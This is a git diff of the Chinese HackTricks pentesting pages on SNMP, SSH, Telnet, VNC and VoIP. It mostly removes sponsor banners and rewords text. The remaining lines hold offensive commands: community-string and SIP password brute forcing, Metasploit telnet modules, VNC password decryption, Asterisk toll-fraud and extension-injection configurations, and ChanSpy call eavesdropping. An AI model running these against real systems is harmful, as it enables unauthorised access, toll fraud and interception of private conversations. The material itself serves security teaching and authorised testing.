-存储在 MIB 表中的日志会被检查 **失败的登录尝试**,这可能意外地包括作为用户名输入的密码。搜索关键词如 _fail_、_failed_ 或 _login_ 以找到有价值的数据:
+存储在 MIB 表中的日志会被检查 **登录失败尝试**,这可能意外地包括作为用户名输入的密码。搜索关键词如 _fail_、_failed_ 或 _login_ 以找到有价值的数据:
 ```bash
 grep -i "login\|fail" *.snmp
 ```
 ### **电子邮件**
 
-最后,为了从数据中提取 **电子邮件地址**,使用带有正则表达式的 **grep 命令**,重点关注与电子邮件格式匹配的模式:
+最后,为了从数据中提取**电子邮件地址**,使用带有正则表达式的**grep命令**,重点关注与电子邮件格式匹配的模式:
 ```bash
 grep -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" *.snmp
 ```
@@ -221,7 +215,7 @@ grep -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" *.snmp
 
 ## 欺骗
 
-如果有一个 ACL 仅允许某些 IP 查询 SMNP 服务,您可以在 UDP 数据包中伪造其中一个地址并嗅探流量。
+如果有一个 ACL 只允许某些 IP 查询 SMNP 服务,您可以在 UDP 数据包中伪造其中一个地址并嗅探流量。
 
 ## 检查 SNMP 配置文件
 
@@ -229,12 +223,6 @@ grep -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" *.snmp
 - snmpd.conf
 - snmp-config.xml
 
-

-
-如果您对 **黑客职业** 感兴趣并想要攻克不可攻克的目标 - **我们正在招聘!** (_要求流利的波兰语书写和口语能力_)。
-
-{% embed url="https://www.stmcyber.com/careers" %}
-
 ## HackTricks 自动命令
 ```
 Protocol_Name: SNMP    #Protocol Abbreviation if there is one.
diff --git a/src/network-services-pentesting/pentesting-snmp/cisco-snmp.md b/src/network-services-pentesting/pentesting-snmp/cisco-snmp.md
index a8c7aa32b..6457d0a60 100644
--- a/src/network-services-pentesting/pentesting-snmp/cisco-snmp.md
+++ b/src/network-services-pentesting/pentesting-snmp/cisco-snmp.md
@@ -2,15 +2,9 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-

+## Pentesting Cisco Networks
 
-如果你对**黑客职业**感兴趣并想要攻克不可攻克的目标 - **我们正在招聘!**(_需要流利的波兰语书写和口语能力_)。
-
-{% embed url="https://www.stmcyber.com/careers" %}
-
-## 渗透测试 Cisco 网络
-
-**SNMP** 通过 UDP 在 161/UDP 端口上处理一般消息,在 162/UDP 端口上处理陷阱消息。该协议依赖于社区字符串,作为密码使 SNMP 代理和服务器之间能够通信。这些字符串至关重要,因为它们决定了访问级别,具体为**只读(RO)或读写(RW)权限**。对于渗透测试人员来说,一个显著的攻击向量是**暴力破解社区字符串**,旨在渗透网络设备。
+**SNMP** 通过 UDP 在 161/UDP 端口上处理一般消息,在 162/UDP 端口上处理陷阱消息。该协议依赖于社区字符串,作为密码使 SNMP 代理和服务器之间能够通信。这些字符串至关重要,因为它们决定了访问级别,具体为 **只读 (RO) 或读写 (RW) 权限**。对于渗透测试人员来说,一个显著的攻击向量是 **暴力破解社区字符串**,旨在渗透网络设备。
 
 执行此类暴力攻击的实用工具是 [**onesixtyone**](https://github.com/trailofbits/onesixtyone),它需要潜在社区字符串的列表和目标的 IP 地址:
 ```bash
@@ -39,10 +33,5 @@ msf6 auxiliary(scanner/snmp/snmp_enum) > exploit
 
 - [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9)
 
-

-
-如果你对**黑客职业**感兴趣并想要攻克不可攻克的目标 - **我们正在招聘!**(_需要流利的波兰语书写和口语能力_)。
-
-{% embed url="https://www.stmcyber.com/careers" %}
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/network-services-pentesting/pentesting-ssh.md b/src/network-services-pentesting/pentesting-ssh.md
index 9a49bbe85..849ca22a6 100644
--- a/src/network-services-pentesting/pentesting-ssh.md
+++ b/src/network-services-pentesting/pentesting-ssh.md
@@ -2,17 +2,13 @@
 
 {{#include ../banners/hacktricks-training.md}}
 
-

 
-**漏洞赏金提示**: **注册** **Intigriti**,这是一个由黑客为黑客创建的高级**漏洞赏金平台**!今天就加入我们,访问 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达 **$100,000** 的赏金!
-
-{% embed url="https://go.intigriti.com/hacktricks" %}
 
 ## 基本信息
 
-**SSH (安全外壳或安全套接字外壳)** 是一种网络协议,允许在不安全的网络上与计算机建立安全连接。它对于在访问远程系统时维护数据的机密性和完整性至关重要。
+**SSH (安全外壳或安全套接字外壳)** 是一种网络协议,允许通过不安全的网络与计算机建立安全连接。它对于在访问远程系统时维护数据的机密性和完整性至关重要。
 
-**默认端口:** 22
+**默认端口:** 22
 ```
 22/tcp open  ssh     syn-ack
 ```
@@ -27,7 +23,7 @@
 
 - [libssh](https://www.libssh.org) – 多平台 C 库,实现 SSHv2 协议,支持 [Python](https://github.com/ParallelSSH/ssh-python)、[Perl](https://github.com/garnier-quentin/perl-libssh/) 和 [R](https://github.com/ropensci/ssh) 的绑定;被 KDE 用于 sftp,GitHub 用于 git SSH 基础设施
 - [wolfSSH](https://www.wolfssl.com/products/wolfssh/) – 用 ANSI C 编写的 SSHv2 服务器库,针对嵌入式、RTOS 和资源受限环境
-- [Apache MINA SSHD](https://mina.apache.org/sshd-project/index.html) – 基于 Apache MINA 的 Apache SSHD Java 库
+- [Apache MINA SSHD](https://mina.apache.org/sshd-project/index.html) – Apache SSHD Java 库基于 Apache MINA
 - [paramiko](https://github.com/paramiko/paramiko) – Python SSHv2 协议库
 
 ## 枚举
@@ -40,7 +36,7 @@ nc -vn  22
 
 ssh-audit 是一个用于 ssh 服务器和客户端配置审计的工具。
 
-[https://github.com/jtesta/ssh-audit](https://github.com/jtesta/ssh-audit) 是一个来自 [https://github.com/arthepsy/ssh-audit/](https://github.com/arthepsy/ssh-audit/) 的更新分支
+[https://github.com/jtesta/ssh-audit](https://github.com/jtesta/ssh-audit) 是一个来自 [https://github.com/arthepsy/ssh-audit/](https://github.com/arthepsy/ssh-audit/) 的更新分支。
 
 **功能:**
 
@@ -54,7 +50,7 @@ ssh-audit 是一个用于 ssh 服务器和客户端配置审计的工具。
 - 根据算法信息分析 SSH 版本兼容性;
 - 来自 OpenSSH、Dropbear SSH 和 libssh 的历史信息;
 - 在 Linux 和 Windows 上运行;
-- 无依赖
+- 无依赖。
 ```bash
 usage: ssh-audit.py [-1246pbcnjvlt] 
 
@@ -77,7 +73,7 @@ $ python3 ssh-audit 
 ```
 [查看实际操作 (Asciinema)](https://asciinema.org/a/96ejZKxpbuupTK9j7h8BdClzp)
 
-### 服务器的公共 SSH 密钥
+### 服务器的公钥 SSH
 ```bash
 ssh-keyscan -t rsa  -p 
 ```
@@ -193,7 +189,7 @@ SSH 服务器默认允许 root 用户登录,这构成了重大安全风险。*
 1. **编辑 SSH 配置文件**:`sudoedit /etc/ssh/sshd_config`
 2. **将设置更改** 从 `#PermitRootLogin yes` 为 **`PermitRootLogin no`**。
 3. **使用以下命令重新加载配置**:`sudo systemctl daemon-reload`
-4. **重启 SSH 服务器** 以应用更改:`sudo systemctl restart sshd`
+4. **重启 SSH 服务器以应用更改**:`sudo systemctl restart sshd`
 
 ### SFTP 暴力破解
 
@@ -226,7 +222,7 @@ debug1: Exit status 0
 
 $ ssh noraj@192.168.1.94 /bin/bash
 ```
-以下是用户 `noraj` 的安全 SFTP 配置示例 (`/etc/ssh/sshd_config` – openSSH):
+以下是用户 `noraj` 的安全 SFTP 配置示例(`/etc/ssh/sshd_config` – openSSH):
 ```
 Match User noraj
 ChrootDirectory %h
@@ -285,17 +281,11 @@ id_rsa
 - [https://packetstormsecurity.com/files/download/71252/sshfuzz.txt](https://packetstormsecurity.com/files/download/71252/sshfuzz.txt)
 - [https://www.rapid7.com/db/modules/auxiliary/fuzzers/ssh/ssh_version_2](https://www.rapid7.com/db/modules/auxiliary/fuzzers/ssh/ssh_version_2)
 
-## 参考文献
+## 参考
 
 - 你可以在 [https://www.ssh-audit.com/hardening_guides.html](https://www.ssh-audit.com/hardening_guides.html) 找到关于如何加强 SSH 的有趣指南
 - [https://community.turgensec.com/ssh-hacking-guide](https://community.turgensec.com/ssh-hacking-guide)
 
-

-
-**漏洞赏金提示**:**注册** **Intigriti**,一个由黑客为黑客创建的高级**漏洞赏金平台**!今天就加入我们 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达 **$100,000** 的赏金!
-
-{% embed url="https://go.intigriti.com/hacktricks" %}
-
 ## HackTricks 自动命令
 ```
 Protocol_Name: SSH
diff --git a/src/network-services-pentesting/pentesting-telnet.md b/src/network-services-pentesting/pentesting-telnet.md
index 7219b8383..f57636fb1 100644
--- a/src/network-services-pentesting/pentesting-telnet.md
+++ b/src/network-services-pentesting/pentesting-telnet.md
@@ -2,17 +2,10 @@
 
 {{#include ../banners/hacktricks-training.md}}
 
-

-
-**从黑客的角度看待您的网络应用、网络和云**
-
-**查找并报告具有实际业务影响的关键可利用漏洞。** 使用我们20多个自定义工具来映射攻击面,发现让您提升权限的安全问题,并使用自动化漏洞利用收集重要证据,将您的辛勤工作转化为有说服力的报告。
-
-{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
 
 ## **基本信息**
 
-Telnet是一种网络协议,允许用户以不安全的方式通过网络访问计算机。
+Telnet 是一种网络协议,允许用户以不安全的方式通过网络访问计算机。
 
 **默认端口:** 23
 ```
@@ -30,7 +23,7 @@ nmap -n -sV -Pn --script "*telnet* and safe" -p 23 
 ```
 脚本 `telnet-ntlm-info.nse` 将获取 NTLM 信息(Windows 版本)。
 
-来自 [telnet RFC](https://datatracker.ietf.org/doc/html/rfc854):在 TELNET 协议中有各种 "**options**",可以使用 "**DO, DON'T, WILL, WON'T**" 结构进行授权,以便用户和服务器同意使用一组更复杂(或许只是不同)的约定来进行他们的 TELNET 连接。这些选项可能包括更改字符集、回显模式等。
+来自 [telnet RFC](https://datatracker.ietf.org/doc/html/rfc854):在 TELNET 协议中有各种 "**options**",可以使用 "**DO, DON'T, WILL, WON'T**" 结构进行授权,以便用户和服务器同意使用更复杂(或可能只是不同)的约定集进行 TELNET 连接。这些选项可能包括更改字符集、回显模式等。
 
 **我知道可以枚举这些选项,但我不知道怎么做,所以如果你知道怎么做,请告诉我。**
 
@@ -74,12 +67,4 @@ Note: sourced from https://github.com/carlospolop/legion
 Command: msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_version; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/brocade_enable_login; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_encrypt_overflow; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_ruggedcom; set RHOSTS {IP}; set RPORT 23; run; exit'
 
 ```
-

-
-**从黑客的角度看待您的网络应用、网络和云**
-
-**发现并报告具有实际商业影响的关键可利用漏洞。** 使用我们20多个自定义工具来映射攻击面,找到让您提升权限的安全问题,并使用自动化漏洞利用收集重要证据,将您的辛勤工作转化为有说服力的报告。
-
-{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
-
 {{#include ../banners/hacktricks-training.md}}
diff --git a/src/network-services-pentesting/pentesting-vnc.md b/src/network-services-pentesting/pentesting-vnc.md
index cb9671a57..ec8552f69 100644
--- a/src/network-services-pentesting/pentesting-vnc.md
+++ b/src/network-services-pentesting/pentesting-vnc.md
@@ -2,17 +2,11 @@
 
 {{#include ../banners/hacktricks-training.md}}
 
-

-
-如果您对**黑客职业**感兴趣并想要攻克不可攻克的目标 - **我们正在招聘!** (_需要流利的波兰语书写和口语能力_).
-
-{% embed url="https://www.stmcyber.com/careers" %}
-
 ## 基本信息
 
-**虚拟网络计算 (VNC)** 是一个强大的图形桌面共享系统,利用**远程帧缓冲 (RFB)** 协议来实现与另一台计算机的远程控制和协作。通过 VNC,用户可以通过双向传输键盘和鼠标事件与远程计算机无缝互动。这允许实时访问,并促进高效的远程协助或网络协作。
+**虚拟网络计算 (VNC)** 是一个强大的图形桌面共享系统,利用 **远程帧缓冲 (RFB)** 协议来实现对另一台计算机的远程控制和协作。通过 VNC,用户可以通过双向传输键盘和鼠标事件与远程计算机无缝互动。这允许实时访问,并促进通过网络进行高效的远程协助或协作。
 
-VNC 通常使用端口**5800 或 5801 或 5900 或 5901.**
+VNC 通常使用端口 **5800 或 5801 或 5900 或 5901。**
 ```
 PORT    STATE SERVICE
 5900/tcp open  vnc
@@ -32,13 +26,13 @@ vncviewer [-passwd passwd.txt] ::5901
 
 默认 **密码存储在**: \~/.vnc/passwd
 
-如果你有 VNC 密码并且它看起来是加密的(几个字节,像是可能是加密的密码),它很可能是用 3des 加密的。你可以使用 [https://github.com/jeroennijhof/vncpwd](https://github.com/jeroennijhof/vncpwd) 获取明文密码。
+如果你有 VNC 密码并且看起来是加密的(几个字节,像是可能是加密的密码),它很可能是用 3des 加密的。你可以使用 [https://github.com/jeroennijhof/vncpwd](https://github.com/jeroennijhof/vncpwd) 获取明文密码。
 ```bash
 make
 vncpwd 
 ```
 您可以这样做,因为用于加密明文 VNC 密码的 3des 中使用的密码多年前已被破解。\
-对于 **Windows**,您还可以使用此工具:[https://www.raymond.cc/blog/download/did/232/](https://www.raymond.cc/blog/download/did/232/)\
+对于 **Windows**,您还可以使用此工具: [https://www.raymond.cc/blog/download/did/232/](https://www.raymond.cc/blog/download/did/232/)\
 我在这里也保存了该工具以便于访问:
 
 {% file src="../images/vncpwd.zip" %}
@@ -47,10 +41,5 @@ vncpwd 
 
 - `port:5900 RFB`
 
-

-
-如果您对 **黑客职业** 感兴趣并想要攻克不可攻克的目标 - **我们正在招聘!** (_要求流利的波兰语书写和口语能力_)。
-
-{% embed url="https://www.stmcyber.com/careers" %}
 
 {{#include ../banners/hacktricks-training.md}}
diff --git a/src/network-services-pentesting/pentesting-voip/README.md b/src/network-services-pentesting/pentesting-voip/README.md
index e8fedec13..e0bbe51ae 100644
--- a/src/network-services-pentesting/pentesting-voip/README.md
+++ b/src/network-services-pentesting/pentesting-voip/README.md
@@ -2,17 +2,9 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-

+## VoIP 基本信息
 
-**从黑客的角度看待您的网络应用、网络和云**
-
-**查找并报告具有实际业务影响的关键可利用漏洞。** 使用我们20多个自定义工具来映射攻击面,发现让您提升权限的安全问题,并使用自动化漏洞利用收集重要证据,将您的辛勤工作转化为有说服力的报告。
-
-{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
-
-## VoIP基本信息
-
-要开始了解VoIP的工作原理,请查看:
+要开始了解 VoIP 的工作原理,请查看:
 
 {{#ref}}
 basic-voip-protocols/
@@ -140,7 +132,7 @@ OPTIONS		Query the capabilities of an endpoint					RFC 3261
 
 红队可以采取的第一步是使用 OSINT 工具、Google 搜索或抓取网页来搜索可用的电话号码以联系公司。
 
-一旦你拥有电话号码,可以使用在线服务来识别运营商:
+一旦你有了电话号码,你可以使用在线服务来识别运营商:
 
 - [https://www.numberingplans.com/?page=analysis\&sub=phonenr](https://www.numberingplans.com/?page=analysis&sub=phonenr)
 - [https://mobilenumbertracker.com/](https://mobilenumbertracker.com/)
@@ -225,7 +217,7 @@ PBX 还可能暴露其他网络服务,例如:
 - **3306 (MySQL)**: MySQL 数据库
 - **5038 (Manager)**: 允许从其他平台使用 Asterisk
 - **5222 (XMPP)**: 使用 Jabber 发送消息
-- 其他...
+- 还有其他...
 
 ### 方法枚举
 
@@ -235,7 +227,7 @@ sippts enumerate -i 10.10.0.10
 ```
 ### 分析服务器响应
 
-分析服务器返回给我们的头信息非常重要,这取决于我们发送的消息和头信息的类型。使用来自 [**sippts**](https://github.com/Pepelux/sippts) 的 `SIPPTS send`,我们可以发送个性化消息,操纵所有头信息,并分析响应。
+分析服务器返回给我们的头部信息非常重要,这取决于我们发送的消息和头部的类型。使用来自 [**sippts**](https://github.com/Pepelux/sippts) 的 `SIPPTS send`,我们可以发送个性化消息,操纵所有头部,并分析响应。
 ```bash
 sippts send -i 10.10.0.10 -m INVITE -ua Grandstream -fu 200 -fn Bob -fd 11.0.0.1 -tu 201 -fn Alice -td 11.0.0.2 -header "Allow-Events: presence" -sdp
 ```
@@ -251,7 +243,7 @@ PBX(私人分支交换)系统中的扩展指的是**分配给组织或企业
 ```bash
 svwar 10.10.0.10 -p5060 -e100-300 -m REGISTER
 ```
-- **`SIPPTS exten`**来自[**sippts**](https://github.com/Pepelux/sippts)**:** SIPPTS exten用于识别SIP服务器上的扩展。Sipexten可以检查大范围的网络和端口。
+- **`SIPPTS exten`** 来自 [**sippts**](https://github.com/Pepelux/sippts)**:** SIPPTS exten 识别 SIP 服务器上的扩展。 Sipexten 可以检查大范围的网络和端口。
 ```bash
 sippts exten -i 10.10.0.10 -r 5060 -e 100-200
 ```
@@ -276,7 +268,7 @@ enumiax -v -m3 -M3 10.10.0.10
 >
 > 如果用户名与分机不同,您需要 **找出用户名以进行暴力破解**。
 
-- **`svcrack`** 来自 SIPVicious (`sudo apt install sipvicious`):SVCrack 允许您破解 PBX 上特定用户名/分机的密码。
+- **`svcrack`** 来自 SIPVicious (`sudo apt install sipvicious`): SVCrack 允许您破解 PBX 上特定用户名/分机的密码。
 ```bash
 svcrack -u100 -d dictionary.txt udp://10.0.0.1:5080 #Crack known username
 svcrack -u100 -r1-9999 -z4 10.0.0.1 #Check username in extensions
@@ -293,7 +285,7 @@ sippts rcrack -i 10.10.0.10 -e 100,101,103-105 -w wordlist/rockyou.txt
 
 如果你在**开放的Wifi网络**中发现VoIP设备,你可以**嗅探所有信息**。此外,如果你在一个更封闭的网络中(通过以太网或受保护的Wifi连接),你可以执行**MitM攻击,例如** [**ARPspoofing**](../../generic-methodologies-and-resources/pentesting-network/#arp-spoofing),在**PBX和网关**之间嗅探信息。
 
-在网络信息中,你可能会找到**管理设备的网页凭证**、用户**分机**、**用户名**、**IP**地址,甚至**哈希密码**和**RTP数据包**,你可以重放这些数据包以**听到对话**,等等。
+在网络信息中,你可能会找到**管理设备的网页凭据**、用户**分机**、**用户名**、**IP**地址,甚至**哈希密码**和**RTP数据包**,你可以重放这些数据包以**听到对话**,等等。
 
 要获取这些信息,你可以使用Wireshark、tcpdump等工具……但一个**专门创建的嗅探VoIP对话的工具是** [**ucsniff**](https://github.com/Seabreg/ucsniff)。
 
@@ -301,9 +293,9 @@ sippts rcrack -i 10.10.0.10 -e 100,101,103-105 -w wordlist/rockyou.txt
 > 请注意,如果**SIP通信中使用了TLS**,你将无法看到明文的SIP通信。\
 > 如果使用**SRTP**和**ZRTP**,**RTP数据包将不会是明文**。
 
-#### SIP凭证(密码暴力破解 - 离线)
+#### SIP凭据(密码暴力破解 - 离线)
 
-[查看这个例子以更好地理解**SIP REGISTER通信**](basic-voip-protocols/sip-session-initiation-protocol.md#sip-register-example),以了解**凭证是如何发送的**。
+[查看这个例子以更好地理解**SIP REGISTER通信**](basic-voip-protocols/sip-session-initiation-protocol.md#sip-register-example),以了解**凭据是如何发送的**。
 
 - **`sipdump`** & **`sipcrack`,**是**sipcrack**的一部分(`apt-get install sipcrack`):这些工具可以**从**pcap中**提取**SIP协议中的**摘要认证**并进行**暴力破解**。
 ```bash
@@ -314,11 +306,11 @@ sipcrack sip-creds.txt -w dict.txt
 ```bash
 sippts dump -f capture.pcap -o data.txt
 ```
-- **`SIPPTS dcrack`** from [**sippts**](https://github.com/Pepelux/sippts)**:** SIPPTS dcrack 是一个用于破解通过 SIPPTS dump 获得的摘要认证的工具。
+- **`SIPPTS dcrack`**来自[**sippts**](https://github.com/Pepelux/sippts)**:** SIPPTS dcrack 是一个用于破解通过 SIPPTS dump 获得的摘要认证的工具。
 ```bash
 sippts dcrack -f data.txt -w wordlist/rockyou.txt
 ```
-- **`SIPPTS tshark`**来自[**sippts**](https://github.com/Pepelux/sippts)**:** SIPPTS tshark 从 PCAP 文件中提取 SIP 协议的数据。
+- **`SIPPTS tshark`** 来自 [**sippts**](https://github.com/Pepelux/sippts)**:** SIPPTS tshark 从 PCAP 文件中提取 SIP 协议的数据。
 ```bash
 sippts tshark -f capture.pcap [-filter auth]
 ```
@@ -331,7 +323,7 @@ multimon -a DTMF -t wac pin.wav
 ```
 ### 免费通话 / Asterisks 连接配置错误
 
-在 Asterisk 中,可以允许 **来自特定 IP 地址** 或 **任何 IP 地址** 的连接:
+在 Asterisk 中,可以允许来自 **特定 IP 地址** 或 **任何 IP 地址** 的连接:
 ```
 host=10.10.10.10
 host=dynamic
@@ -341,8 +333,8 @@ host=dynamic
 要定义用户,可以定义为:
 
 - **`type=user`**:用户只能接收电话。
-- **`type=friend`**:可以作为对等方进行通话并作为用户接收通话(与扩展一起使用)
-- **`type=peer`**:可以作为对等方发送和接收通话(SIP-trunks)
+- **`type=friend`**:可以作为对等方拨打电话并作为用户接收电话(与扩展一起使用)
+- **`type=peer`**:可以作为对等方发送和接收电话(SIP-trunks)
 
 还可以通过不安全变量建立信任:
 
@@ -373,7 +365,7 @@ exten => 100,1,Answer()
 exten => 100,n,Playback(welcome)
 exten => 100,n,Hangup()
 ```
-这个示例演示了一个名为 "my_context" 的简单上下文,扩展为 "100"。当有人拨打 100 时,电话将被接听,播放欢迎信息,然后通话将被终止。
+这个示例演示了一个简单的上下文,称为 "my_context",扩展为 "100"。当有人拨打 100 时,电话将被接听,播放欢迎信息,然后通话将被终止。
 
 这是 **另一个上下文**,允许 **拨打任何其他号码**:
 ```scss
@@ -390,7 +382,7 @@ include => external
 > 任何人都可以使用 **服务器拨打任何其他号码**(服务器的管理员将为通话付费)。
 
 > [!CAUTION]
-> 此外,默认情况下 **`sip.conf`** 文件包含 **`allowguest=true`**,因此 **任何** 攻击者在 **没有认证** 的情况下都可以拨打任何其他号码。
+> 此外,默认情况下 **`sip.conf`** 文件包含 **`allowguest=true`**,因此 **任何** 攻击者在 **没有认证** 的情况下都能够拨打任何其他号码。
 
 - **`SIPPTS invite`** 来自 [**sippts**](https://github.com/Pepelux/sippts)**:** SIPPTS invite 检查 **PBX 服务器是否允许我们在没有认证的情况下拨打电话**。如果 SIP 服务器配置不正确,它将允许我们拨打外部号码。它还可以允许我们将通话转移到第二个外部号码。
 
@@ -404,17 +396,17 @@ sippts invite -i 10.10.0.10 -tu 555555555 -t 444444444
 ```
 ### 免费电话 / 配置错误的 IVRS
 
-IVRS 代表 **交互式语音响应系统**,是一种电话技术,允许用户通过语音或触摸音调输入与计算机系统互动。IVRS 用于构建 **自动呼叫处理** 系统,提供一系列功能,如提供信息、路由电话和捕获用户输入。
+IVRS 代表 **交互式语音响应系统**,是一种电话技术,允许用户通过语音或触摸音输入与计算机系统进行交互。IVRS 用于构建 **自动呼叫处理** 系统,提供一系列功能,例如提供信息、路由电话和捕获用户输入。
 
 VoIP 系统中的 IVRS 通常包括:
 
 1. **语音提示**:引导用户通过 IVR 菜单选项和说明的预录音频消息。
-2. **DTMF**(双音多频)信号:通过按下电话上的按键生成的触摸音调输入,用于在 IVR 菜单中导航和提供输入。
-3. **呼叫路由**:根据用户输入将电话直接转接到适当的目的地,如特定部门、代理或分机。
-4. **用户输入捕获**:收集来电者的信息,如账户号码、案件 ID 或任何其他相关数据。
+2. **DTMF**(双音多频)信号:通过按下电话上的按键生成的触摸音输入,用于在 IVR 菜单中导航和提供输入。
+3. **呼叫路由**:根据用户输入将电话直接转接到适当的目的地,例如特定部门、代理或分机。
+4. **用户输入捕获**:收集来电者的信息,例如账户号码、案件 ID 或任何其他相关数据。
 5. **与外部系统的集成**:将 IVR 系统连接到数据库或其他软件系统,以访问或更新信息、执行操作或触发事件。
 
-在 Asterisk VoIP 系统中,您可以使用拨号计划(**`extensions.conf`** 文件)和各种应用程序(如 `Background()`、`Playback()`、`Read()` 等)创建 IVR。这些应用程序帮助您播放语音提示、捕获用户输入并控制呼叫流程。
+在 Asterisk VoIP 系统中,您可以使用拨号计划 (**`extensions.conf`** 文件) 和各种应用程序,如 `Background()`、`Playback()`、`Read()` 等,创建 IVR。这些应用程序帮助您播放语音提示、捕获用户输入并控制呼叫流程。
 
 #### 易受攻击的配置示例
 ```scss
@@ -424,7 +416,7 @@ exten => 0,102,GotoIf("$[${numbers}"="2"]?300)
 exten => 0,103,GotoIf("$[${numbers}"=""]?100)
 exten => 0,104,Dial(LOCAL/${numbers})
 ```
-之前的例子中,用户被要求**按1拨打**一个部门,**按2拨打**另一个部门,或者**如果知道完整的分机号**则直接输入。\
+之前的例子中,用户被要求**按1拨打**一个部门,**按2拨打**另一个部门,或者如果他知道完整的分机号,可以直接输入。\
 漏洞在于所指示的**分机长度没有被检查,因此用户可以输入5秒超时的完整号码并进行拨打。**
 
 ### 分机注入
@@ -445,7 +437,7 @@ exten => 101&SIP123123123,1,Dial(SIP/101&SIP123123123)
 
 ## SIPDigestLeak 漏洞
 
-SIP Digest Leak 是一个影响大量 SIP 电话的漏洞,包括硬件和软件 IP 电话以及电话适配器(VoIP 到模拟)。该漏洞允许 **泄露 Digest 认证响应**,该响应是根据密码计算的。然后可以进行 **离线密码攻击**,并根据挑战响应恢复大多数密码。
+SIP Digest Leak 是一个影响大量 SIP 电话的漏洞,包括硬件和软件 IP 电话以及电话适配器(VoIP 转模拟)。该漏洞允许 **泄露 Digest 认证响应**,该响应是根据密码计算的。然后可以进行 **离线密码攻击**,并根据挑战响应恢复大多数密码。
 
 **[漏洞场景来自这里**](https://resources.enablesecurity.com/resources/sipdigestleak-tut.pdf):
 
@@ -480,7 +472,7 @@ Auth=Digest username="pepelux", realm="asterisk", nonce="lcwnqoz0", uri="sip:100
 ```
 ### Click2Call
 
-Click2Call 允许一个 **网络用户**(例如可能对某个产品感兴趣) **提供** 他的 **电话号码** 以接收电话。然后会拨打一个商业电话,当他 **接听电话** 时,用户将 **被呼叫并与代理连接**。
+Click2Call 允许一个 **web 用户**(例如可能对某个产品感兴趣) **提供** 他的 **电话号码** 以接收电话。然后会拨打一个商业电话,当他 **接听电话** 时,用户将被 **呼叫并与代理连接**。
 
 一个常见的 Asterisk 配置文件是:
 ```scss
@@ -506,11 +498,11 @@ exec 3<>/dev/tcp/10.10.10.10/5038 && echo -e "Action: Login\nUsername:test\nSecr
 
 在 Asterisk 中,可以使用命令 **`ChanSpy`** 指定要监控的 **分机**(或所有分机)来听取正在进行的对话。此命令需要分配给一个分机。
 
-例如,**`exten => 333,1,ChanSpy('all',qb)`** 表示如果您 **拨打** **分机 333**,它将 **监控** **`all`** 分机,**开始监听** 每当新的对话开始时 (**`b`**) 以静默模式 (**`q`**) 进行,因为我们不想参与其中。您可以通过按 **`*`** 或输入分机号码在进行中的对话之间切换。
+例如,**`exten => 333,1,ChanSpy('all',qb)`** 表示如果您 **拨打** **分机 333**,它将 **监控** **`all`** 分机,**开始监听** 每当新的对话开始时 (**`b`**) 以静音模式 (**`q`**) 进行,因为我们不想参与其中。您可以通过按 **`*`** 或输入分机号码在进行中的对话之间切换。
 
 也可以使用 **`ExtenSpy`** 仅监控一个分机。
 
-除了监听对话外,还可以使用分机将其 **录制到文件中**,例如:
+除了监听对话外,还可以使用分机将其 **录制到文件** 中,例如:
 ```scss
 [recorded-context]
 exten => _X.,1,Set(NAME=/tmp/${CONTEXT}_${EXTEN}_${CALLERID(num)}_${UNIQUEID}.wav)
@@ -524,11 +516,11 @@ exten => h,1,System(/tmp/leak_conv.sh &)
 ```
 ### RTCPBleed 漏洞
 
-**RTCPBleed** 是一个主要的安全问题,影响基于 Asterisk 的 VoIP 服务器(发布于 2017 年)。该漏洞允许 **RTP(实时传输协议)流量**,即承载 VoIP 通话的流量,被 **互联网上的任何人拦截和重定向**。这发生的原因是 RTP 流量在通过 NAT(网络地址转换)防火墙时绕过了身份验证。
+**RTCPBleed** 是一个主要的安全问题,影响基于 Asterisk 的 VoIP 服务器(于 2017 年发布)。该漏洞允许 **RTP(实时传输协议)流量**,即承载 VoIP 通话的流量,被 **互联网上的任何人拦截和重定向**。这是因为 RTP 流量在通过 NAT(网络地址转换)防火墙时绕过了身份验证。
 
-RTP 代理尝试通过在两个或多个参与者之间代理 RTP 流来解决影响 RTC 系统的 **NAT 限制**。当 NAT 存在时,RTP 代理软件通常无法依赖通过信令(例如 SIP)获取的 RTP IP 和端口信息。因此,一些 RTP 代理实现了一种机制,使得这样的 **IP 和端口元组能够自动学习**。这通常是通过检查传入的 RTP 流量并将任何传入 RTP 流量的源 IP 和端口标记为应响应的来完成的。这种机制可能被称为“学习模式”,**不使用任何形式的身份验证**。因此,**攻击者** 可以 **向 RTP 代理发送 RTP 流量**,并接收原本应发送给正在进行的 RTP 流的呼叫者或被呼叫者的代理 RTP 流量。我们称这种漏洞为 RTP Bleed,因为它允许攻击者接收原本应发送给合法用户的 RTP 媒体流。
